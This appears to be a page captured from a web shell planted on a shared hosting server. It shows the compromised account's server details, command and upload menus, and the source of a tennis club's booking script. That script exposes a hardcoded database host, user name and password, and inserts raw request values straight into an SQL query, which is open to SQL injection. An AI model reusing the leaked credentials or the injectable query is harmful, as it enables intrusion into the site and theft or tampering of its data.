Server IP : 10.111.20.6  /  Your IP : 216.73.217.80
Web Server : Apache
System : Linux webm006.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : edizioni ( 7252)
PHP Version : 8.3.23
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0705) :  /home/edizioni/stampaeweb/../extonymask/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/edizioni/stampaeweb/../extonymask/salvaorario.php
<head>
  <title>Circolo Tennis Ribera</title>
<link rel="stylesheet" href="classifica.css">
<link rel="stylesheet" href=css/simplex.css>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css">
</head>
<?php
    $ora = $_REQUEST['txt_ora'];
    $campo = $_REQUEST['txt_campo'];
    $damo = $_REQUEST['txt_damo'];
    $testo = $_REQUEST['txt_nome'];
    $tipo = $_REQUEST['tipo'];
    $ip = $_SERVER['REMOTE_ADDR'];
        include_once('mysql-fix.php');
        require_once("support/funformat.php");
         include('funzioni.php');
         $dbhost1 = "edizionitonym4sk.mysql.db"; $dbname1 = "edizionitonym4sk"; $dbuser1 = "edizionitonym4sk";    $dbpass1 = "Didier0533";
         $conn1 = mysql_connect($dbhost1,$dbuser1,$dbpass1)
               or die("Impossibile collegarsi al server MySQL.");
         mysql_select_db($dbname1,$conn1)
               or die("Impossibile selezionare il database $dbname");

            $sql="INSERT INTO `circolo_orari` (`id`, `damo`, `orario`, `testo`, `campo`, `ip`, `tipo`) VALUES (NULL, '$damo', '$ora', '$testo', '$campo', '$ip','$tipo')";
            $e = esegui_query($sql);
?>
<body>
<div style="padding-left:3%; width:100%">
    <div class="ranking-title"><img src="imgtennisti/logosito.png" style="width:80px"></div>
    <h1>Registrazione effettuata</h1>
    <p style="margin:1%"><a href="cale.php" target="_SELF"><b class="btn btn-info btn-sm">Calendario</b></a></p>
</div>
</body>